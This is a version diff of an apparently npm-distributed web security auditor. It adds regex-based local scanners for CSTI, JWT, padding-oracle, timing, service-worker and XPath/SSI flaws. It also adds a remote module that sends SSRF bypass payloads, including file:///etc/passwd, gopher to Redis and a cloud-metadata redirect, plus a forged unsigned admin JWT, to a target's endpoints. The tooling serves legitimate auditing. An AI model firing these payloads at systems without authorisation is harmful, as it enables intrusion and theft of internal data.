redgun-security 1.2.0 → 1.3.0

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "redgun-security",
-  "version": "1.2.0",
+  "version": "1.3.0",
   "description": "Black-box & white-box security auditor for web applications with HackTricks techniques",
   "type": "module",
   "main": "scan.js",

package/scan.js

@@ -5,6 +5,7 @@ import { runCrawler } from './src/remote/crawler.js';
 import { runProbe } from './src/remote/probe.js';
 import { scanXxeRemote, scanOauthRemote, scanAccessControlRemote, scanWebCacheDeception, scanParameterPollution, scanFileUpload, scanDomBased, scanHttp2 } from './src/remote/portswigger.js';
 import { scanSamlRemote, scanLdapRemote, scanMfaBypass, scanWebsocketReplay, scanPasswordReset, scanCsrfRemote, scanDanglingDns, scanCloudRemote } from './src/remote/advanced.js';
+import { scanSsrfBypassChains, scanJwtRemoteAdvanced, scanGrpc, scanOpenApi, scanWebrtc, scanStoredDomXss, scanSsiRemote, scanXpathRemote, scanTimingRemote } from './src/remote/complete.js';
 
 export async function runRemoteScan(url, spinner, modules = null) {
   const target = new URL(url);
@@ -55,6 +56,15 @@ export async function runRemoteScan(url, spinner, modules = null) {
     { name: 'CSRF Token Analysis (remote)', value: 'csrf', fn: () => scanCsrfRemote(origin, spinner) },
     { name: 'Subdomain Takeover (Dangling DNS)', value: 'takeover', fn: () => scanDanglingDns(hostname, spinner) },
     { name: 'Cloud Metadata SSRF', value: 'cloudmeta', fn: () => scanCloudRemote(origin, spinner) },
+    { name: 'SSRF Bypass Chains', value: 'ssrfbypass', fn: () => scanSsrfBypassChains(origin, spinner) },
+    { name: 'JWT Advanced (kid/none/JWK)', value: 'jwtadv', fn: () => scanJwtRemoteAdvanced(origin, spinner) },
+    { name: 'gRPC Reflection', value: 'grpc', fn: () => scanGrpc(origin, spinner) },
+    { name: 'OpenAPI/Swagger Fuzz', value: 'openapi', fn: () => scanOpenApi(origin, spinner) },
+    { name: 'WebRTC IP Leak', value: 'webrtc', fn: () => scanWebrtc(origin, spinner) },
+    { name: 'Stored/DOM XSS Auto', value: 'storedxss', fn: () => scanStoredDomXss(origin, spinner) },
+    { name: 'SSI Injection Remote', value: 'ssi', fn: () => scanSsiRemote(origin, spinner) },
+    { name: 'XPath Injection Remote', value: 'xpath', fn: () => scanXpathRemote(origin, spinner) },
+    { name: 'Timing Side-Channel', value: 'timing', fn: () => scanTimingRemote(origin, spinner) },
   ];
 
   const toRun = modules ? allModules.filter((m) => modules.includes(m.value)) : allModules;

package/src/local/csti.js

@@ -0,0 +1,71 @@
+import { readFileSync, readdirSync, statSync } from 'fs';
+import { join, extname } from 'path';
+import { addFinding } from '../core/findings.js';
+
+const SCAN_EXTENSIONS = ['.js', '.ts', '.jsx', '.tsx', '.py', '.rb', '.php', '.go', '.java'];
+const IGNORE_DIRS = ['node_modules', '.git', 'dist', 'build', '__pycache__', 'vendor'];
+
+export async function auditCsti(projectPath, spinner) {
+  spinner.text = 'Scanning for client-side template injection...';
+  const files = getFiles(projectPath);
+
+  for (const file of files) {
+    try {
+      const content = readFileSync(file, 'utf-8');
+      const relativePath = file.replace(projectPath, '.');
+      const lines = content.split('\n');
+
+      const patterns = [
+        { pattern: /\{\{.+\}\}/g, name: 'AngularJS double-curly expression', severity: 'INFO' },
+        { pattern: /ng-app|ng-controller|ng-bind-html|ng-non-bindable/gi, name: 'AngularJS bindings detected', severity: 'INFO' },
+        { pattern: /\$sce\.trustAsHtml|\$sceProvider\.enabled\s*\(\s*false/gi, name: 'AngularJS SCE disabled/untrusted HTML', severity: 'HIGH' },
+        { pattern: /ng-bind-html\s*=\s*(?:req|request|params|query|body)/gi, name: 'AngularJS ng-bind-html with user input', severity: 'HIGH' },
+        { pattern: /angular\.module.*run\s*\(/gi, name: 'AngularJS module detected', severity: 'INFO' },
+        { pattern: /v-html\s*=\s*(?:req|params|query|body)/gi, name: 'Vue v-html with user input', severity: 'HIGH' },
+        { pattern: /v-bind:src|:src\s*=\s*['"`]\{\{/gi, name: 'Vue dynamic src binding', severity: 'MEDIUM' },
+        { pattern: /Vue\.compile\s*\(|new\s+Vue\s*\(|createApp\s*\(/gi, name: 'Vue instance detected', severity: 'INFO' },
+        { pattern: /React\.createElement|ReactDOM\.render|createRoot\s*\(/gi, name: 'React rendering detected', severity: 'INFO' },
+        { pattern: /dangerouslySetInnerHTML\s*:\s*\{\s*__html\s*:\s*(?:req|params|query|body)/gi, name: 'React dangerouslySetInnerHTML with user input', severity: 'HIGH' },
+        { pattern: /Svelte.*\$set|Svelte.*\$\$invalidate|Svelte.*dangerously/gi, name: 'Svelte dynamic updates', severity: 'MEDIUM' },
+        { pattern: /TemplateRef|ViewContainerRef|ComponentFactoryResolver/gi, name: 'Angular dynamic component (XSS surface)', severity: 'MEDIUM' },
+        { pattern: /bypassSecurityTrustHtml\s*\(/gi, name: 'Angular bypassSecurityTrustHtml', severity: 'HIGH' },
+        { pattern: /bypassSecurityTrustScript|bypassSecurityTrustResourceUrl/gi, name: 'Angular bypassSecurityTrust (unsafe)', severity: 'HIGH' },
+        { pattern: /ElementRef\.nativeElement\.innerHTML/gi, name: 'Angular ElementRef innerHTML', severity: 'MEDIUM' },
+        { pattern: /sanitizeHtml|DOMPurify\.sanitize/gi, name: 'HTML sanitization used (good)', severity: 'INFO' },
+      ];
+
+      for (const { pattern, name, severity } of patterns) {
+        let match;
+        while ((match = pattern.exec(content)) !== null) {
+          const lineNum = content.substring(0, match.index).split('\n').length;
+          const line = lines[lineNum - 1]?.trim() || '';
+          if (line.startsWith('//') || line.startsWith('#') || line.startsWith('*')) continue;
+
+          addFinding(
+            severity,
+            'Client-Side Template Injection (CSTI)',
+            name,
+            `File: ${relativePath}:${lineNum}\nCode: ${line.substring(0, 120)}`,
+            'Never bind user input to v-html/dangerouslySetInnerHTML/ng-bind-html. Use DOMPurify for sanitization. Avoid bypassSecurityTrust* APIs. Use Angular default sanitizer. For Vue, use v-text instead of v-html.'
+          );
+        }
+      }
+    } catch {}
+  }
+}
+
+function getFiles(dir, files = []) {
+  try {
+    const entries = readdirSync(dir);
+    for (const entry of entries) {
+      if (IGNORE_DIRS.includes(entry) || entry.startsWith('.')) continue;
+      const fullPath = join(dir, entry);
+      try {
+        const stat = statSync(fullPath);
+        if (stat.isDirectory()) getFiles(fullPath, files);
+        else if (SCAN_EXTENSIONS.includes(extname(entry).toLowerCase()) && stat.size < 512 * 1024) files.push(fullPath);
+      } catch {}
+    }
+  } catch {}
+  return files;
+}

package/src/local/index.js

@@ -24,6 +24,12 @@ import { auditCloud } from './cloud.js';
 import { auditCicd } from './cicd.js';
 import { auditMobile } from './mobile.js';
 import { auditWeb3 } from './web3.js';
+import { auditXpathSsi } from './xpath-ssi.js';
+import { auditTiming } from './timing.js';
+import { auditJwtAdvanced } from './jwt-advanced.js';
+import { auditCsti } from './csti.js';
+import { auditServiceWorker } from './service-worker.js';
+import { auditPaddingOracle } from './padding-oracle.js';
 
 export const LOCAL_MODULES = [
   { name: 'Code Secrets', value: 'secrets', fn: auditSecrets },
@@ -52,6 +58,12 @@ export const LOCAL_MODULES = [
   { name: 'CI/CD Pipeline', value: 'cicd', fn: auditCicd },
   { name: 'Mobile Security', value: 'mobile', fn: auditMobile },
   { name: 'Web3 / Smart Contracts', value: 'web3', fn: auditWeb3 },
+  { name: 'XPath / SSI Injection', value: 'xpath', fn: auditXpathSsi },
+  { name: 'Timing Side-Channels', value: 'timing', fn: auditTiming },
+  { name: 'JWT Advanced (kid, JWK, jku)', value: 'jwtadv', fn: auditJwtAdvanced },
+  { name: 'Client-Side Template Injection (CSTI)', value: 'csti', fn: auditCsti },
+  { name: 'Service Worker / WebRTC', value: 'sworker', fn: auditServiceWorker },
+  { name: 'Padding / Compression Oracle', value: 'padding', fn: auditPaddingOracle },
 ];
 
 export async function runLocalAudit(projectPath, spinner, modules = null) {

package/src/local/jwt-advanced.js

@@ -0,0 +1,70 @@
+import { readFileSync, readdirSync, statSync } from 'fs';
+import { join, extname } from 'path';
+import { addFinding } from '../core/findings.js';
+
+const SCAN_EXTENSIONS = ['.js', '.ts', '.jsx', '.tsx', '.py', '.rb', '.php', '.go', '.java', '.json', '.env'];
+const IGNORE_DIRS = ['node_modules', '.git', 'dist', 'build', '__pycache__', 'vendor'];
+
+export async function auditJwtAdvanced(projectPath, spinner) {
+  spinner.text = 'Scanning for advanced JWT attacks (kid, JWK, jku)...';
+  const files = getFiles(projectPath);
+
+  for (const file of files) {
+    try {
+      const content = readFileSync(file, 'utf-8');
+      const relativePath = file.replace(projectPath, '.');
+      const lines = content.split('\n');
+
+      const patterns = [
+        { pattern: /(?:kid|keyId|key_id)\s*[:=]\s*(?:req|request|params|query|body|input)/gi, name: 'Key ID (kid) from user input - path traversal/LFI attack', severity: 'CRITICAL' },
+        { pattern: /jwk\s*[:=]\s*(?:req|request|params|query|body)/gi, name: 'JWK from user input - key injection', severity: 'CRITICAL' },
+        { pattern: /jku\s*[:=]\s*(?:req|request|params|query|body)/gi, name: 'jku (JWK Set URL) from user input - SSRF', severity: 'CRITICAL' },
+        { pattern: /x5u\s*[:=]\s*(?:req|request|params|query|body)/gi, name: 'x5u URL from user input', severity: 'CRITICAL' },
+        { pattern: /x5c\s*[:=]\s*(?:req|request|params|query|body)/gi, name: 'x5c certificate from user input', severity: 'CRITICAL' },
+        { pattern: /algorithm\s*[:=]\s*['"]none['"]|alg\s*:\s*['"]none['"]/gi, name: 'Algorithm "none" accepted', severity: 'CRITICAL' },
+        { pattern: /algorithms\s*:\s*\[.*['"]HS256['"].*\]|algorithm\s*:\s*['"]HS256['"]/gi, name: 'HS256 algorithm (key confusion vector)', severity: 'HIGH' },
+        { pattern: /(?:verify|validate)\s*\(\s*(?:token|jwt)\s*,\s*(?:secret|key)\s*,?\s*\{[^}]*algorithms?\s*:\s*\[/gi, name: 'JWT verify with algorithm whitelist', severity: 'INFO' },
+        { pattern: /jwt\.(?:decode|sign|verify).*complete\s*:\s*true/gi, name: 'jwt.io format (complete decode)', severity: 'LOW' },
+        { pattern: /jsonwebtoken|jose|jwk-to-pem|jwt-simple|njwt/gi, name: 'JWT library usage', severity: 'INFO' },
+        { pattern: /(?:publicKey|public_key|pubkey)\s*[:=]\s*(?:req|request|params|query|body)/gi, name: 'Public key from user input (key confusion)', severity: 'CRITICAL' },
+        { pattern: /(?:jwt|token|bearer).*(?:header|payload)\s*.*(?:decode|parse|split|extract)\s*\(/gi, name: 'JWT header/payload parsing (check algorithm handling)', severity: 'MEDIUM' },
+        { pattern: /jwt\.sign\s*\(\s*[^,]*,\s*['"][a-zA-Z0-9]{1,16}['"]/gi, name: 'Weak JWT signing secret (<16 chars)', severity: 'HIGH' },
+        { pattern: /(?:secret|jwtSecret|JWT_SECRET)\s*=\s*['"]?[a-zA-Z0-9]{1,24}['"]?/gi, name: 'Short JWT secret in code', severity: 'HIGH' },
+        { pattern: /crypto\.createPublicKey|crypto\.createPrivateKey/gi, name: 'crypto key creation (check source)', severity: 'INFO' },
+      ];
+
+      for (const { pattern, name, severity } of patterns) {
+        let match;
+        while ((match = pattern.exec(content)) !== null) {
+          const lineNum = content.substring(0, match.index).split('\n').length;
+          const line = lines[lineNum - 1]?.trim() || '';
+          if (line.startsWith('//') || line.startsWith('#') || line.startsWith('*')) continue;
+
+          addFinding(
+            severity,
+            'JWT Advanced Attacks',
+            name,
+            `File: ${relativePath}:${lineNum}\nCode: ${line.substring(0, 120)}`,
+            'Whitelist allowed algorithms (e.g., ["RS256"]). Never use "none" algorithm. Do not accept kid/jwk/jku/x5u from untrusted input. Use asymmetric signing (RS256/ES256). Validate kid against a trusted key store, not a file path. Check for key confusion: if using RS256 ensure public key is not accepted as HMAC secret.'
+          );
+        }
+      }
+    } catch {}
+  }
+}
+
+function getFiles(dir, files = []) {
+  try {
+    const entries = readdirSync(dir);
+    for (const entry of entries) {
+      if (IGNORE_DIRS.includes(entry) || entry.startsWith('.')) continue;
+      const fullPath = join(dir, entry);
+      try {
+        const stat = statSync(fullPath);
+        if (stat.isDirectory()) getFiles(fullPath, files);
+        else if (SCAN_EXTENSIONS.includes(extname(entry).toLowerCase()) && stat.size < 512 * 1024) files.push(fullPath);
+      } catch {}
+    }
+  } catch {}
+  return files;
+}

package/src/local/padding-oracle.js

@@ -0,0 +1,66 @@
+import { readFileSync, readdirSync, statSync } from 'fs';
+import { join, extname } from 'path';
+import { addFinding } from '../core/findings.js';
+
+const SCAN_EXTENSIONS = ['.js', '.ts', '.jsx', '.tsx', '.py', '.rb', '.php', '.go', '.java', '.c', '.cpp', '.cs'];
+const IGNORE_DIRS = ['node_modules', '.git', 'dist', 'build', '__pycache__', 'vendor'];
+
+export async function auditPaddingOracle(projectPath, spinner) {
+  spinner.text = 'Scanning for padding/comression oracle vulnerabilities...';
+  const files = getFiles(projectPath);
+
+  for (const file of files) {
+    try {
+      const content = readFileSync(file, 'utf-8');
+      const relativePath = file.replace(projectPath, '.');
+      const lines = content.split('\n');
+
+      const patterns = [
+        { pattern: /(?:decrypt|decipher|unpad)\s*\([^)]*\)\s*(?:catch|if.*error)/gi, name: 'Decryption with error handling (padding oracle)', severity: 'HIGH' },
+        { pattern: /(?:padding|decrypt)\s*(?:bad|invalid|wrong|error|fail)/gi, name: 'Decryption error message (padding oracle indicator)', severity: 'HIGH' },
+        { pattern: /CBC|cipher\.final|cipher\.update/gi, name: 'CBC mode encryption (padding oracle vector)', severity: 'MEDIUM' },
+        { pattern: /createDecipheriv\s*\(\s*['"](?:aes|des)-.*-(?:cbc|ecb)/gi, name: 'CBC/ECB mode decrypt (potential padding oracle)', severity: 'MEDIUM' },
+        { pattern: /(?:error|exception|err)\s*\(\s*['"](?:bad|invalid|wrong) (?:padding|decrypt|cipher)/gi, name: 'Padding error in response', severity: 'HIGH' },
+        { pattern: /OAEP|RSASSA-PSS|RSAES-OAEP/gi, name: 'RSA OAEP padding (good)', severity: 'INFO' },
+        { pattern: /PKCS|pkcs/i, name: 'PKCS padding reference', severity: 'INFO' },
+        { pattern: /gzip|deflate|compress|zlib|Content-Encoding/gi, name: 'Compression usage (CRIME/BREACH vector)', severity: 'LOW' },
+        { pattern: /(?:token|session|cookie|jwt).*(?:compress|gzip|deflate)/gi, name: 'Compression of secrets/tokens (CRIME/BREACH)', severity: 'MEDIUM' },
+        { pattern: /(?:https|tls|ssl).*(?:compress|gzip|deflate)/gi, name: 'TLS compression reference (CRIME)', severity: 'MEDIUM' },
+        { pattern: /\bcrypto\.createDecipheriv\b/gi, name: 'Node.js createDecipheriv (check error handling)', severity: 'MEDIUM' },
+      ];
+
+      for (const { pattern, name, severity } of patterns) {
+        let match;
+        while ((match = pattern.exec(content)) !== null) {
+          const lineNum = content.substring(0, match.index).split('\n').length;
+          const line = lines[lineNum - 1]?.trim() || '';
+          if (line.startsWith('//') || line.startsWith('#') || line.startsWith('*')) continue;
+
+          addFinding(
+            severity,
+            'Padding / Compression Oracle',
+            name,
+            `File: ${relativePath}:${lineNum}\nCode: ${line.substring(0, 120)}`,
+            'Use authenticated encryption (AES-GCM, ChaCha20-Poly1305) instead of CBC. Never leak decryption errors to clients. Add random MAC before encrypting. Disable TLS compression. Avoid compressing response bodies that contain secrets or CSRF tokens.'
+          );
+        }
+      }
+    } catch {}
+  }
+}
+
+function getFiles(dir, files = []) {
+  try {
+    const entries = readdirSync(dir);
+    for (const entry of entries) {
+      if (IGNORE_DIRS.includes(entry) || entry.startsWith('.')) continue;
+      const fullPath = join(dir, entry);
+      try {
+        const stat = statSync(fullPath);
+        if (stat.isDirectory()) getFiles(fullPath, files);
+        else if (SCAN_EXTENSIONS.includes(extname(entry).toLowerCase()) && stat.size < 512 * 1024) files.push(fullPath);
+      } catch {}
+    }
+  } catch {}
+  return files;
+}

package/src/local/service-worker.js

@@ -0,0 +1,64 @@
+import { readFileSync, readdirSync, statSync } from 'fs';
+import { join, extname } from 'path';
+import { addFinding } from '../core/findings.js';
+
+const SCAN_EXTENSIONS = ['.js', '.ts', '.jsx', '.tsx', '.html', '.htm'];
+const IGNORE_DIRS = ['node_modules', '.git', 'dist', 'build', '__pycache__', 'vendor'];
+
+export async function auditServiceWorker(projectPath, spinner) {
+  spinner.text = 'Scanning for Service Worker abuse vectors...';
+  const files = getFiles(projectPath);
+
+  for (const file of files) {
+    try {
+      const content = readFileSync(file, 'utf-8');
+      const relativePath = file.replace(projectPath, '.');
+      const lines = content.split('\n');
+
+      const patterns = [
+        { pattern: /navigator\.serviceWorker\.register\s*\(/gi, name: 'Service Worker registration', severity: 'INFO' },
+        { pattern: /importScripts\s*\(/gi, name: 'Service Worker importScripts (XSS via sw)', severity: 'HIGH' },
+        { pattern: /self\.addEventListener\s*\(\s*['"]fetch['"]/gi, name: 'Service Worker fetch listener', severity: 'INFO' },
+        { pattern: /self\.addEventListener\s*\(\s*['"]message['"]/gi, name: 'Service Worker message listener (postMessage attack)', severity: 'MEDIUM' },
+        { pattern: /respondWith\s*\(\s*fetch\s*\(\s*event\.request\s*\)/gi, name: 'SW passthrough fetch (check URL rewriting)', severity: 'MEDIUM' },
+        { pattern: /event\.respondWith\s*\(\s*new\s+Response/gi, name: 'SW custom response (check for content injection)', severity: 'MEDIUM' },
+        { pattern: /CacheStorage|self\.caches\s*\./gi, name: 'Cache API usage (cache poisoning via SW)', severity: 'LOW' },
+        { pattern: /Clients\.claim\s*\(\s*\)|self\.clients\.claim/gi, name: 'Service Worker immediate claim (malicious takeover)', severity: 'HIGH' },
+        { pattern: /self\.skipWaiting/gi, name: 'SW skipWaiting (immediate activation)', severity: 'MEDIUM' },
+        { pattern: /navigator\.serviceWorker\.getRegistration|navigator\.serviceWorker\.controller/gi, name: 'SW control check', severity: 'INFO' },
+        { pattern: /self\.registration\.unregister/gi, name: 'SW unregistration', severity: 'LOW' },
+        { pattern: /PushManager|pushManager\.subscribe|showNotification/gi, name: 'Push notifications (notification spam vector)', severity: 'LOW' },
+      ];
+
+      for (const { pattern, name, severity } of patterns) {
+        let match;
+        while ((match = pattern.exec(content)) !== null) {
+          const lineNum = content.substring(0, match.index).split('\n').length;
+          addFinding(
+            severity,
+            'Service Worker / WebRTC',
+            name,
+            `File: ${relativePath}:${lineNum}\nCode: ${lines[lineNum - 1]?.trim().substring(0, 120)}`,
+            'Restrict Service Worker scope (/). Use importScripts from same-origin only. Validate fetch events to prevent response tampering. Monitor dangerously overwritable headers. Limit Cache API usage to prevent storage exhaustion.'
+          );
+        }
+      }
+    } catch {}
+  }
+}
+
+function getFiles(dir, files = []) {
+  try {
+    const entries = readdirSync(dir);
+    for (const entry of entries) {
+      if (IGNORE_DIRS.includes(entry) || entry.startsWith('.')) continue;
+      const fullPath = join(dir, entry);
+      try {
+        const stat = statSync(fullPath);
+        if (stat.isDirectory()) getFiles(fullPath, files);
+        else if (SCAN_EXTENSIONS.includes(extname(entry).toLowerCase()) && stat.size < 512 * 1024) files.push(fullPath);
+      } catch {}
+    }
+  } catch {}
+  return files;
+}

package/src/local/timing.js

@@ -0,0 +1,66 @@
+import { readFileSync, readdirSync, statSync } from 'fs';
+import { join, extname } from 'path';
+import { addFinding } from '../core/findings.js';
+
+const SCAN_EXTENSIONS = ['.js', '.ts', '.jsx', '.tsx', '.py', '.rb', '.php', '.go', '.java'];
+const IGNORE_DIRS = ['node_modules', '.git', 'dist', 'build', '__pycache__', 'vendor'];
+
+export async function auditTiming(projectPath, spinner) {
+  spinner.text = 'Scanning for timing side-channel vulnerabilities...';
+  const files = getFiles(projectPath);
+
+  for (const file of files) {
+    try {
+      const content = readFileSync(file, 'utf-8');
+      const relativePath = file.replace(projectPath, '.');
+      const lines = content.split('\n');
+
+      const patterns = [
+        { pattern: /(?:password|secret|token|key|hash|pin).*\s*={2,3}\s*(?:req|request|params|body|input)/gi, name: 'String comparison with user input (timing leak)', severity: 'HIGH' },
+        { pattern: /(?:password|secret|token|key|hash|pin)\s*===\s*/gi, name: 'Strict comparison used (good for timing)', severity: 'INFO' },
+        { pattern: /crypto\.timingSafeEqual|timingsafe\b/gi, name: 'Timing-safe comparison used (good)', severity: 'INFO' },
+        { pattern: /\b(?:sleep|delay|wait|setTimeout|setInterval)\s*\(\s*(?:req|request|params|query|body)/gi, name: 'User-controlled delay/sleep (potential timing oracle)', severity: 'MEDIUM' },
+        { pattern: /(?:if|when)\s*\([^)]*(?:req|request|params|query|body)[^)]*\)\s*(?:\{|\n)\s*(?:sleep|delay|setTimeout)/gi, name: 'Conditional sleep based on user input', severity: 'HIGH' },
+        { pattern: /(?:login|auth|signin).*select.*password.*(?:req|request|params)/gi, name: 'Password DB lookup (check for timing leak on user-not-found)', severity: 'MEDIUM' },
+        { pattern: /bcrypt\.compare|bcrypt\.compareSync|argon2\.verify/gi, name: 'bcrypt/argon2 verification (timing-safe)', severity: 'INFO' },
+        { pattern: /(?:hash|digest|hmac)\s*\(\s*['"]?(?:md5|sha1|sha256|sha512)['"]?\s*,/gi, name: 'Hash function usage (check HMAC timing)', severity: 'LOW' },
+        { pattern: /(?:for|while)\s*\([^)]*(?:req|request|params|query|body)[^)]*\)/gi, name: 'Loop iteration from user input (DoS + timing oracle)', severity: 'MEDIUM' },
+        { pattern: /(?:username|email|user).*exists|(?:findOne|findUser)\s*\(\s*\{.*username/gi, name: 'User existence check (potential oracle)', severity: 'LOW' },
+        { pattern: /PasswordResetListener|SentMessage|mail.*send.*token/gi, name: 'Email sending after reset request (timing oracle on user existence)', severity: 'LOW' },
+      ];
+
+      for (const { pattern, name, severity } of patterns) {
+        let match;
+        while ((match = pattern.exec(content)) !== null) {
+          const lineNum = content.substring(0, match.index).split('\n').length;
+          const line = lines[lineNum - 1]?.trim() || '';
+          if (line.startsWith('//') || line.startsWith('#') || line.startsWith('*')) continue;
+
+          addFinding(
+            severity,
+            'Timing Side-Channels',
+            name,
+            `File: ${relativePath}:${lineNum}\nCode: ${line.substring(0, 120)}`,
+            'Use constant-time comparison (timingSafeEqual) for secrets. Ensure login returns identical responses regardless of user existence. Add random jitter to email sending. Never use sleep/delay from user input.'
+          );
+        }
+      }
+    } catch {}
+  }
+}
+
+function getFiles(dir, files = []) {
+  try {
+    const entries = readdirSync(dir);
+    for (const entry of entries) {
+      if (IGNORE_DIRS.includes(entry) || entry.startsWith('.')) continue;
+      const fullPath = join(dir, entry);
+      try {
+        const stat = statSync(fullPath);
+        if (stat.isDirectory()) getFiles(fullPath, files);
+        else if (SCAN_EXTENSIONS.includes(extname(entry).toLowerCase()) && stat.size < 512 * 1024) files.push(fullPath);
+      } catch {}
+    }
+  } catch {}
+  return files;
+}

package/src/local/xpath-ssi.js

@@ -0,0 +1,67 @@
+import { readFileSync, readdirSync, statSync } from 'fs';
+import { join, extname } from 'path';
+import { addFinding } from '../core/findings.js';
+
+const SCAN_EXTENSIONS = ['.js', '.ts', '.jsx', '.tsx', '.py', '.rb', '.php', '.go', '.java'];
+const IGNORE_DIRS = ['node_modules', '.git', 'dist', 'build', '__pycache__', 'vendor'];
+
+export async function auditXpathSsi(projectPath, spinner) {
+  spinner.text = 'Scanning for XPath & SSI injection...';
+  const files = getFiles(projectPath);
+
+  for (const file of files) {
+    try {
+      const content = readFileSync(file, 'utf-8');
+      const relativePath = file.replace(projectPath, '.');
+      const lines = content.split('\n');
+
+      const patterns = [
+        { pattern: /XPath\.evaluate\s*\(\s*(?:req|request|params|query|body|user)/gi, name: 'XPath evaluate with user input', severity: 'CRITICAL' },
+        { pattern: /xpath\.select\s*\(\s*(?:req|request|params|query|body)/gi, name: 'XPath select with user input', severity: 'CRITICAL' },
+        { pattern: /(?:find|query|select)\s*\(\s*['"`]\/\/(?:\w+::)?(\w+)\[.*\$\{/gi, name: 'XPath query with template literal', severity: 'CRITICAL' },
+        { pattern: /(?:find|query|select)\s*\(\s*['"`]\/\/(?:\w+::)?(\w+)\[.*\+/gi, name: 'XPath query with concatenated input', severity: 'CRITICAL' },
+        { pattern: /SimpleXMLElement.*xpath\s*\(\s*\$_(?:GET|POST|REQUEST)/gi, name: 'PHP SimpleXML xpath user input', severity: 'CRITICAL' },
+        { pattern: /DOMXPath.*query\s*\(\s*\$_(?:GET|POST|REQUEST)/gi, name: 'PHP DOMXPath query user input', severity: 'CRITICAL' },
+        { pattern: /xpath\.compile\s*\(\s*(?:req|request|input)/gi, name: 'XPath compile with user input', severity: 'HIGH' },
+        { pattern: /<!--#\s*(?:include|exec|echo|fsize|flastmod|config)/gi, name: 'Server-Side Includes (SSI) in templates', severity: 'HIGH' },
+        { pattern: /<!--#echo\s+var|<!--#include\s+(?:virtual|file)|<!--#exec/gi, name: 'SSI directives in source', severity: 'CRITICAL' },
+        { pattern: /(?:shtml|stm|shtm)/gi, name: 'SSI file extension (.shtml)', severity: 'MEDIUM' },
+        { pattern: /Options\s+\+Includes|AddHandler.*server-parsed/gi, name: 'Apache SSI enabled', severity: 'LOW' },
+        { pattern: /(?:include|exec|echo)\s*\(\s*(?:req|request|params|input)/gi, name: 'Server include with user input', severity: 'CRITICAL' },
+      ];
+
+      for (const { pattern, name, severity } of patterns) {
+        let match;
+        while ((match = pattern.exec(content)) !== null) {
+          const lineNum = content.substring(0, match.index).split('\n').length;
+          const line = lines[lineNum - 1]?.trim() || '';
+          if (line.startsWith('//') || line.startsWith('#') || line.startsWith('*')) continue;
+
+          addFinding(
+            severity,
+            'XPath / SSI Injection',
+            name,
+            `File: ${relativePath}:${lineNum}\nCode: ${line.substring(0, 120)}`,
+            'Use parameterized XPath queries. Sanitize input against special chars (, ), [, ], :, *, /, @, !, =, >, <. Disable SSI unless needed (Options -Includes). Never pass user input to SSI directives.'
+          );
+        }
+      }
+    } catch {}
+  }
+}
+
+function getFiles(dir, files = []) {
+  try {
+    const entries = readdirSync(dir);
+    for (const entry of entries) {
+      if (IGNORE_DIRS.includes(entry) || entry.startsWith('.')) continue;
+      const fullPath = join(dir, entry);
+      try {
+        const stat = statSync(fullPath);
+        if (stat.isDirectory()) getFiles(fullPath, files);
+        else if (SCAN_EXTENSIONS.includes(extname(entry).toLowerCase()) && stat.size < 512 * 1024) files.push(fullPath);
+      } catch {}
+    }
+  } catch {}
+  return files;
+}

package/src/remote/complete.js

@@ -0,0 +1,240 @@
+import { addFinding } from '../core/findings.js';
+import { fetchText, fetchWithTimeout } from '../utils/fetch.js';
+
+export async function scanSsrfBypassChains(origin, spinner) {
+  spinner.text = 'Testing SSRF bypass chains (DNS rebinding, redirect, encoding)...';
+
+  const ssrfParams = ['url', 'link', 'src', 'callback', 'webhook', 'fetch', 'proxy', 'redirect', 'image', 'file', 'path', 'feed'];
+  const bypassPayloads = [
+    { name: 'IPv4 decimal', value: 'http://2130706433/' },
+    { name: 'IPv4 hex', value: 'http://0x7f000001/' },
+    { name: 'IPv4 octal', value: 'http://017700000001/' },
+    { name: 'IPv4 short', value: 'http://127.1/' },
+    { name: 'IPv6 loopback', value: 'http://[::1]/' },
+    { name: 'IPv6 localhost', value: 'http://[0:0:0:0:0:ffff:127.0.0.1]/' },
+    { name: 'DNS rebinding (nip.io)', value: 'http://127.0.0.1.nip.io/' },
+    { name: 'DNS rebinding (xip.io)', value: 'http://127.0.0.1.xip.io/' },
+    { name: 'localhost variants', value: 'http://localhost/' },
+    { name: 'localhost with port', value: 'http://localhost:22/' },
+    { name: '0.0.0.0', value: 'http://0.0.0.0/' },
+    { name: 'Double URL encode', value: 'http://%31%32%37%2e%30%2e%30%2e%31/' },
+    { name: 'Unicode bypass', value: 'http://①②⑦.⓪.⓪.①/' },
+    { name: 'File protocol', value: 'file:///etc/passwd' },
+    { name: 'Gopher protocol', value: 'gopher://127.0.0.1:6379/' },
+    { name: 'Dict protocol', value: 'dict://127.0.0.1:22/' },
+    { name: 'Redirect chain', value: 'http://http-redirector.burpcollaborator.net/redirect?target=http://169.254.169.254/' },
+    { name: 'Short URL', value: 'http://bit.ly/127-0-0-1' },
+  ];
+
+  for (const param of ssrfParams) {
+    for (const { name, value } of bypassPayloads.slice(0, 12)) {
+      try {
+        const resp = await fetchText(`${origin}/?${param}=${encodeURIComponent(value)}`, {}, 8000);
+        if (/root:x:0|ssh-|redis_version|ami-id|instance-id|Connection refused|SSH-|HTTP\/1\.[01]/.test(resp.body)) {
+          addFinding('CRITICAL', 'SSRF Bypass Chains', `SSRF bypass via ${name}: ?${param}=`, `Payload "${value}" returned internal service response`, 'Block all internal IP ranges. Normalize URLs before validation. Use egress rules and DNS-level blocking. Implement ALLOW-listing, not DENY-listing.');
+          return;
+        }
+      } catch {}
+    }
+  }
+}
+
+export async function scanJwtRemoteAdvanced(origin, spinner) {
+  spinner.text = 'Testing JWT advanced attacks (kid, JWK, none, key confusion)...';
+
+  const unprotectedPath = `eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.${btoa(JSON.stringify({ sub: 'admin', role: 'admin', exp: 9999999999 }))}.`;
+
+  const apiPaths = ['/api', '/api/me', '/api/user', '/api/profile', '/api/admin', '/dashboard'];
+
+  for (const path of apiPaths) {
+    try {
+      const resp = await fetchText(`${origin}${path}`, {
+        headers: { Authorization: `Bearer ${unprotectedPath}` },
+      }, 5000);
+
+      if (resp.status === 200) {
+        addFinding('CRITICAL', 'JWT Advanced', 'JWT "none" algorithm accepted', `${origin}${path} accepted unsigned JWT with alg=none`, 'Always enforce strict algorithm validation. Whitelist expected algorithms. Never accept "none" algorithm.');
+        break;
+      } else if (resp.status === 403 || resp.status === 401) {
+        addFinding('INFO', 'JWT Advanced', 'JWT rejected (good) at ' + path, `None algorithm rejected with ${resp.status}`, 'Proper algorithm enforcement detected. Ensure RS256 key confusion vector is also blocked.');
+      }
+    } catch {}
+  }
+
+  try {
+    const resp = await fetchText(`${origin}/.well-known/jwks.json`, {}, 5000);
